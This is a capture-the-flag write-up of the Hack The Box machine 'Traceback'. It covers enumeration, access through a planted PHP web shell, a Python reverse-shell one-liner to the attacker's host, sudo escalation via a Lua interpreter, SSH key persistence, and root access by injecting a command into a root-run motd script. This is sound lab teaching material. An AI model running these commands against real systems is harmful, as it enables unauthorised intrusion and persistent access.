# Traceback Writeup ![](img/43.png) ## Introduction : Traceback is an easy linux box released back in march 2020. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → nmap -vvv -p- 10.10.10.181 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered Discovered open port 80/tcp on 10.10.10.181 Discovered open port 22/tcp on 10.10.10.181 [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback] → nmap -sCV -p80,22 10.10.10.181 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-28 22:24 CEST Nmap scan report for 10.10.10.181 Host is up (0.033s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80, so let's investigate it: ![](prg/43_001.png) [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 -u http://10.10.10.181/ We can run a gobuster scan but it doesn't help us, so let's investigate further: [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → curl 10.10.10.181 # This site has been owned ## I have left a backdoor for all the net. FREE INTERNETZZZ ### - Xh4H - <****!--Some of the best web shells that you might need ;)--****> As we curl the website's sourcecode, we see a comment **'Some of the best web shells you might need'** , if we look for this comment on github we find the following repository: ![](prg/43_002.png) And so we know what are the php files on this webserver, and we can save them in a textfile: [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → cat files.txt alfa3.php alfav3.0.1.php andela.php bloodsecv4.php by.php c99ud.php cmd.php configkillerionkros.php jspshell.jspmini.php obfuscated-punknopass.php punk-nopass.php punkholic.php r57.php smevk.php wso2.8.5.php So we run our gobuster scan with our textfile: [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → gobuster dir -u http://10.10.10.181 -w files.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.181 [+] Method: GET [+] Threads: 10 [+] Wordlist: files.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2021/05/29 09:57:50 Starting gobuster in directory enumeration mode =============================================================== /smevk.php (Status: 200) [Size: 1261] =============================================================== 2021/05/29 09:57:50 Finished =============================================================== So let's investigate the page we found : ![](prg/43_003.png) We login with the default credentials **admin:admin** , which leads us to one of the worst looking php shells of all time: ![](prg/43_004.png) And we can execute commands as the webadmin user, and we can use python3 to get a reverse shell: $ which python3 /usr/bin/python3 $ python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.13",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' & And then we simply catch the incoming reverse shell connection on our port 9001: [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.181] 54782 bash: cannot set terminal process group (680): Inappropriate ioctl for device bash: no job control in this shell webadmin@traceback:/var/www/html$ id id uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare) webadmin@traceback:/var/www/html$ ls ls bg.jpg index.html smevk.php webadmin@traceback:/var/www/html$ And we get a shell as the webadmin user! webadmin@traceback:/var/www/html$ ls ~ ls ~ note.txt webadmin@traceback:/var/www/html$ cd ~ cd ~ webadmin@traceback:/home/webadmin$ ls -lash ls -lash total 44K 4.0K drwxr-x--- 5 webadmin sysadmin 4.0K Apr 22 06:08 . 4.0K drwxr-xr-x 4 root root 4.0K Aug 25 2019 .. 4.0K -rw------- 1 webadmin webadmin 105 Mar 16 2020 .bash_history 4.0K -rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout 4.0K -rw-r--r-- 1 webadmin webadmin 3.7K Aug 23 2019 .bashrc 4.0K drwx------ 2 webadmin webadmin 4.0K Aug 23 2019 .cache 4.0K drwxrwxr-x 3 webadmin webadmin 4.0K Apr 22 06:08 .local 4.0K -rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history 4.0K -rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile 4.0K drwxrwxr-x 2 webadmin webadmin 4.0K Feb 27 2020 .ssh 4.0K -rw-rw-r-- 1 sysadmin sysadmin 122 Mar 16 2020 note.txt webadmin@traceback:/var/www/html$ cat ~/note.txt cat ~/note.txt - sysadmin - I have left a tool to practice Lua. I'm sure you know where to find it. Contact me if you have any question. As we take a look around, we see that the sysadmin left a 'tool to practice lua' so let's take a look at what the user can do: webadmin@traceback:/home/webadmin$ sudo -l sudo -l Matching Defaults entries for webadmin on traceback: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User webadmin may run the following commands on traceback: (sysadmin) NOPASSWD: /home/sysadmin/luvit Here we see that we have access to the luvit binary, which can be executed as sysadmin with no password. We also take a look at the user's history: webadmin@traceback:/home/webadmin$ history history 1 ls -la 2 sudo -l 3 nano privesc.lua 4 sudo -u sysadmin /home/sysadmin/luvit privesc.lua 5 rm privesc.lua 6 logout 7 id 8 ls 9 ls ~ 10 cat ~/note.txt 11 cd ~ 12 ls -lash 13 sudo -l 14 history And here you see why this box is called Traceback, the hacker didn't remove the traces of their presence, and thus we see that they were using a file called privesc.lua in alongside the the /home/sysadmin/luvit binary. So let's see what they were trying to do after we upgrade our reverse shell to a fully interactive one: webadmin@traceback:/home/webadmin$ tty tty not a tty webadmin@traceback:/home/webadmin$ python3 -c 'import pty;pty.spawn("/bin/bash")' webadmin@traceback:/home/webadmin$ ^Z #this means CTRL+Z [1] + 3346006 suspended nc -lvnp 9001 [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → stty raw -echo ; fg [1] + 3346006 continued nc -lvnp 9001 webadmin@traceback:/home/webadmin$ export TERM=screen-256color webadmin@traceback:/home/webadmin$ export SHELL=bash webadmin@traceback:/home/webadmin$ stty rows 40 columns 125 webadmin@traceback:/home/webadmin$ reset So we can use the luvit binary to run lua code as the sysadmin user, so let's spawn a shell with it: webadmin@traceback:/home/webadmin$ nano priv.lua require('os'); os.execute('/bin/bash'); CTRL+S CTRL+X webadmin@traceback:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit ./priv.lua sysadmin@traceback:/home/webadmin$ id uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin) sysadmin@traceback:/home/webadmin$ cd ~ sysadmin@traceback:~$ ls luvit user.txt sysadmin@traceback:~$ cat user.txt 08XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to privesc to the sysadmin user, and print the user flag. ## **Part 3 : Getting Root Access** Now we don't want to do all these steps to get a shell as the sysadmin user, so we're going to add our ssh public key to ssh directly as the sysadmin user: sysadmin@traceback:~$ stty rows 80 columns 200 sysadmin@traceback:~$ echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBxPko22MsKasagzuR1ikUtC3idsATUzCyCbU1qCZRmf nothing@nowhere' >> ~/.ssh/authorized_keys sysadmin@traceback:~$ exit exit webadmin@traceback:/home/webadmin$ exit exit webadmin@traceback:/home/webadmin$ exit exit % [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → exit Then ssh as the sysadmin user with the associated private key: [ 10.10.14.13/23 ] [ /dev/pts/13 ] [~/HTB/Traceback] → ssh sysadmin@10.10.10.181 -i ~/.ssh/id_ed25519 The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established. ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts. ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - ################################# Welcome to Xh4H land Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2 $ bash sysadmin@traceback:~$ id uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin) Now in order to privesc to the root user, we need to monitor the processes that are running on the server, especially if there are any that are being run regularly by the root user, and to do so we can use [pspy](https://github.com/DominicBreuker/pspy): [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback] → wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s --2021-05-29 10:45:10-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s Resolving github.com (github.com)... 140.82.121.3 Connecting to github.com (github.com)|140.82.121.3|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-9594-737e4ba5e6fe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20210529%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20210529T084505Z&X-Amz-Expires;=300&X-Amz-Signature;=ef1682d371721693120b61f6e0d48ee367f1f0008248f94748c01642371207f1&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=120821432&response-content-disposition;=attachment%3B%20filename%3Dpspy64s&response-content-type;=application%2Foctet-stream [following] --2021-05-29 10:45:10-- https://github-releases.githubusercontent.com/120821432/d54f2200-c51c-11e9-9594-737e4ba5e6fe?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20210529%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20210529T084505Z&X-Amz-Expires;=300&X-Amz-Signature;=ef1682d371721693120b61f6e0d48ee367f1f0008248f94748c01642371207f1&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=120821432&response-content-disposition;=attachment%3B%20filename%3Dpspy64s&response-content-type;=application%2Foctet-stream Resolving github-releases.githubusercontent.com (github-releases.githubusercontent.com)... 185.199.108.154, 185.199.110.154, 185.199.111.154, ... Connecting to github-releases.githubusercontent.com (github-releases.githubusercontent.com)|185.199.108.154|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 1156536 (1.1M) [application/octet-stream] Saving to: ‘pspy64s’ pspy64s 100%[=====================================================================================================================================================>] 1.10M 3.50MB/s in 0.3s 2021-05-29 10:45:11 (3.50 MB/s) - ‘pspy64s’ saved [1156536/1156536] [ 10.10.14.13/23 ] [ /dev/pts/7 ] [~/HTB/Traceback] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... sysadmin@traceback:~$ which curl wget /usr/bin/wget sysadmin@traceback:~$ wget http://10.10.14.13:9090/pspy64s -O /dev/shm/pspy --2021-05-29 01:54:04-- http://10.10.14.13:9090/pspy64s Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 1156536 (1.1M) [application/octet-stream] Saving to: ‘/dev/shm/pspy’ /dev/shm/pspy 100%[=====================================================================================================================================================>] 1.10M 312KB/s in 3.5s 2021-05-29 01:54:07 (321 KB/s) - ‘/dev/shm/pspy’ saved [1156536/1156536] sysadmin@traceback:~$ chmod +x /dev/shm/pspy sysadmin@traceback:~$ /dev/shm/pspy pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done [...] 2021/05/29 01:54:21 CMD: UID=1001 PID=1310 | /dev/shm/pspy 2021/05/29 01:54:21 CMD: UID=0 PID=1305 | sleep 30 2021/05/29 01:54:21 CMD: UID=0 PID=1304 | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 2021/05/29 01:54:21 CMD: UID=0 PID=1302 | /usr/sbin/CRON -f 2021/05/29 01:54:21 CMD: UID=0 PID=13 | 2021/05/29 01:54:21 CMD: UID=1001 PID=1236 | bash 2021/05/29 01:54:21 CMD: UID=1001 PID=1226 | -sh 2021/05/29 01:54:21 CMD: UID=1001 PID=1224 | sshd: sysadmin@pts/0 2021/05/29 01:54:21 CMD: UID=0 PID=121 | 2021/05/29 01:54:21 CMD: UID=1001 PID=1200 | (sd-pam) 2021/05/29 01:54:21 CMD: UID=0 PID=12 | 2021/05/29 01:54:21 CMD: UID=1001 PID=1199 | /lib/systemd/systemd --user 2021/05/29 01:54:21 CMD: UID=0 PID=1197 | sshd: sysadmin [priv] 2021/05/29 01:54:31 CMD: UID=0 PID=1323 | /bin/cp /var/backups/.update-motd.d/00-header /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/ [...] Here we see that the UID 0 (the root user) runs the **cp** command from **/var/backups/.update-motd.d/** to the **/etc/update-motd.d/** directory. sysadmin@traceback:~$ ls -lash /etc/update-motd.d/ total 32K 4.0K drwxr-xr-x 2 root sysadmin 4.0K Apr 22 06:08 . 4.0K drwxr-xr-x 80 root root 4.0K Apr 22 06:08 .. 4.0K -rwxrwxr-x 1 root sysadmin 981 May 29 01:58 00-header 4.0K -rwxrwxr-x 1 root sysadmin 982 May 29 01:58 10-help-text 8.0K -rwxrwxr-x 1 root sysadmin 4.2K May 29 01:58 50-motd-news 4.0K -rwxrwxr-x 1 root sysadmin 604 May 29 01:58 80-esm 4.0K -rwxrwxr-x 1 root sysadmin 299 May 29 01:58 91-release-upgrade sysadmin@traceback:~$ cat /etc/update-motd.d/00-header #!/bin/sh # # 00-header - create the header of the MOTD # Copyright (C) 2009-2010 Canonical Ltd. # # Authors: Dustin Kirkland <****kirkland@canonical.com> # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License along # with this program; if not, write to the Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. [ -r /etc/lsb-release ] && . /etc/lsb-release echo "\nWelcome to Xh4H land \n" the **00-header** file in particular is responsible for what message appears when you SSH into the machine, and any code in that file will be run as the root account since the ssh-server service is ran by the root user. Since the file is **owned by the sysadmin user** and **ran by the root user** , the sysadmin user can run commands as the root user. such as allowing our public key to be used to login as the root user: sysadmin@traceback:/etc/update-motd.d$ echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/" >> 00-header Now to run the command we added, we ssh as the sysadmin user: [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback] → ssh sysadmin@10.10.10.181 -i ~/.ssh/id_ed25519 ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - ################################# Welcome to Xh4H land and before the 30 second cleanup happens, we login as the root user: [ 10.10.14.13/23 ] [ /dev/pts/31 ] [~/HTB/Traceback] → ssh root@10.10.10.181 -i ~/.ssh/id_ed25519 ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - ################################# Welcome to Xh4H land Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings Last login: Mon Apr 26 02:23:35 2021 root@traceback:~# id uid=0(root) gid=0(root) groups=0(root) root@traceback:~# cat root.txt c4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ## **Conclusion** Here we can see the progress graph : ![](img/43_graph.png)